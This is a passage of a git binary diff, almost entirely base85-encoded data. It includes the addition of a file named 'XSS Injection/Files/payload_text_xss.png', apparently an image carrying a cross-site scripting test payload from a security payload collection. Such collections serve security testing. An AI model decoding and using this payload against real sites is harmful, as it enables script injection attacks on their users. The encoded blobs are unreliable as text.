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 WNweo%*E%ncsmV$zNfe2hJotY&6VhS; literal 0 HcmV?d00001 
diff --git a/XSS Injection/Files/payload_text_xss.png b/XSS Injection/Files/payload_text_xss.png new file mode 100644 index 0000000000000000000000000000000000000000..45e17d51f989be2894e5d29af96aa5255fed5d70 GIT binary patch literal 28082 zcmdRVRaYEL6XxIq4?%-NaCc{bV8K1OySoH;UOc$FOK`UU!QI`0+u#f^%&_@(f5l$3 zp1P>6)Ae*&|EH=fi;4Cb4FCXOev^|@|2Mw=Ye%T?|N2L)fG__BL~98p2>_rm5&g{+ z>ED{tTuxmH0Qf-%00f8sKlIS{ew&%P+O8(&8uXD|VI=uyR$8lvmXZp8l<4Ab6An@*07Wz%>W%S@%FTa! z2*#*lAHPtbx&Zk2aS(71Jyf*5dumy-W~C`e`A9wE_GN7r=Zy7&h5d1Ou@h07QCG)q zJox!ValTBkvPwxyCmOwgzp%ruQcZz$0i`!NV`ZrWVAr8vM8SsOo zwCdJJ1pOk>V_8~Olok_o|2=RId5So95%NgIsWXuGpo>L@`ir$Xwri0-c1O&mcFxD= z6Qg~#^7#CFVv{hywVy`BxJ!ewd2F!SW$5cwWnOf4&O~hBwKY~s!w0}=SO%`9o#i0+ zIbne9|0N|s6S!9`1jukIkk?r;TAzM+T?l^ITR&yPBcl8f!?3RH@h(QGX-3yIarKDV 